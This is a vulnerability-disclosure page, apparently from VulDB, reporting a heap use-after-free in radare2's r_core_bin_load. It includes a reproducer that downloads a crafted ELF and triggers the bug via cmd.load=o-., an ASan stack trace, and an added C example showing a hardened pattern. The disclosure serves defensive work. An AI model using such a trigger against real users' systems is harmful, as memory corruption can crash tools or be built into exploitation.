Submit #850388: radareorg radare2 6.1.6 Use After Free info

Title: radareorg radare2 6.1.6 Use After Free

Description:

> This report was generated by AI and manually verified by a human.

## Environment

```sh
# copypaste this script into your shell and replace it with the output
date
r2 -v
uname -ms
```

## Description

`r_core_bin_load` in `libr/core/cfile.c` can use a freed IO descriptor after `cmd.load` closes the current descriptor during binary loading.

Running radare2 with `cmd.load=o-.` closes the current IO descriptor while `r_core_bin_load` still uses a cached `desc` pointer. ASan reports a heap-use-after-free read at `libr/core/cfile.c:782:14`.

The expected behavior is for the loader to avoid using cached descriptor pointers after command hooks can close or replace the active IO descriptor.

## Test

PoC:

- [run_cmdload_close_cli.sh](https://github.com/Bin-infinite/vuln-validations/blob/main/radare2/target/case-032/pocs/run_cmdload_close_cli.sh)
- [probe.elf](https://github.com/Bin-infinite/vuln-validations/blob/main/radare2/target/case-032/inputs/probe.elf)

Reproducer:

```sh
curl -LO https://raw.githubusercontent.com/Bin-infinite/vuln-validations/main/radare2/target/case-032/inputs/probe.elf
ASAN_OPTIONS=abort_on_error=1:symbolize=1:detect_leaks=0:allocator_may_return_null=1 \
UBSAN_OPTIONS=halt_on_error=0:print_stacktrace=0 \
LSAN_OPTIONS=detect_leaks=0 \
./build/binr/radare2/radare2 -q \
  -e scr.color=0 \
  -e cmd.load=o-. \
  -c q \
  probe.elf
```

Expected sanitizer result:

```text
ERROR: AddressSanitizer: heap-use-after-free
READ of size 4
r_core_bin_load ...
libr/core/cfile.c:782:14
```

Stack trace excerpt:

```text
ERROR: AddressSanitizer: heap-use-after-free
READ of size 4
    #0 r_core_bin_load libr/core/cfile.c:782:14
    #1 binload libr/main/radare2.c:575:8
    #2 r_main_radare2 libr/main/radare2.c:1541:10
    #3 main binr/radare2/radare2.c:119:9

freed by thread T0 here:
    #0 free
    #1 r_io_desc_del libr/io/io_desc.c:61:2
    #2 r_io_desc_close libr/io/io_desc.c:178:2
    #3 cmd_open libr/core/cmd_open.inc.c:2574:11
    #4 r_core_cmd_subst_i libr/core/cmd.c:5386:8
    #5 r_core_cmd_subst libr/core/cmd.c:4096:10
    #6 run_cmd_depth libr/core/cmd.c:6366:9
    #7 r_core_cmd libr/core/cmd.c:6469:8
    #8 r_core_bin_load libr/core/cfile.c:735:3

previously allocated by thread T0 here:
    #0 calloc
    #1 r_io_desc_new libr/io/io_desc.c:12:18
    #2 mmap_open libr/io/p/io_default.c:254:15
    #3 r_io_desc_open libr/io/io_desc.c:122:18
    #4 r_io_open_nomap libr/io/io.c:63:18
    #5 r_core_file_open libr/core/cfile.c:962:16

SUMMARY: AddressSanitizer: heap-use-after-free libr/core/cfile.c:782:14 in r_core_bin_load
```
Source: ⚠️ https://github.com/radareorg/radare2/issues/26049
User: Kery Qi (UID 94424)
Submission: 2026-06-06 07:33 (30 days ago)
Moderation: 2026-07-05 18:03 (29 days later)
Status: Accepted
VulDB entry: 376377 [radareorg radare2 up to 6.1.6 libr/core/cfile.c r_core_bin_load memory corruption]
Points: 20
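
The pattern the report describes, as an added C example that is not radare2 code and not part of the submission: a toy descriptor table (all type, function and field names are hypothetical) in which the loader keeps only the descriptor id across the hook and resolves it again afterwards, instead of reading through a cached pointer.

```c
#include <stdlib.h>

/* Toy model with hypothetical names; not radare2 code. */
#define MAX_DESC 8
typedef struct { int fd; int perm; } Desc;
typedef struct Core Core;
struct Core { Desc *table[MAX_DESC]; int cur_fd; void (*on_load)(Core *); };

static Desc *desc_get(Core *c, int fd) {
    return (fd >= 0 && fd < MAX_DESC) ? c->table[fd] : NULL;
}
static int desc_open(Core *c, int perm) {
    for (int fd = 0; fd < MAX_DESC; fd++) {
        if (c->table[fd]) continue;
        Desc *d = calloc(1, sizeof(*d));
        if (!d) return -1;
        d->fd = fd; d->perm = perm;
        c->table[fd] = d;
        return c->cur_fd = fd;
    }
    return -1;
}
static void desc_close(Core *c, int fd) {
    Desc *d = desc_get(c, fd);
    if (!d) return;
    free(d);
    c->table[fd] = NULL;                 /* stale ids now resolve to NULL */
    if (c->cur_fd == fd) c->cur_fd = -1;
}
/* Hook that closes the current descriptor, as cmd.load=o-. does in the report. */
static void hook_close_current(Core *c) { desc_close(c, c->cur_fd); }

/* Vulnerable shape: Desc *d = desc_get(c, c->cur_fd); c->on_load(c); return d->perm;
 * reads freed memory when the hook closes the descriptor. The hardened shape below
 * keeps only the id across the hook and resolves it again afterwards. */
static int load_perm(Core *c) {
    int fd = c->cur_fd;
    if (!desc_get(c, fd)) return -1;
    if (c->on_load) c->on_load(c);       /* may close or replace descriptors */
    Desc *d = desc_get(c, fd);           /* re-validate; never reuse the old pointer */
    return d ? d->perm : -1;
}

int main(void) {
    Core c = { .cur_fd = -1 };
    desc_open(&c, 5);
    c.on_load = hook_close_current;
    return load_perm(&c) == -1 ? 0 : 1;  /* exit 0: the closed descriptor was detected */
}
```

If the hook closes the descriptor and opens another, the same id can resolve to a different live object, which is memory-safe here but means any state derived before the hook must also be recomputed.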
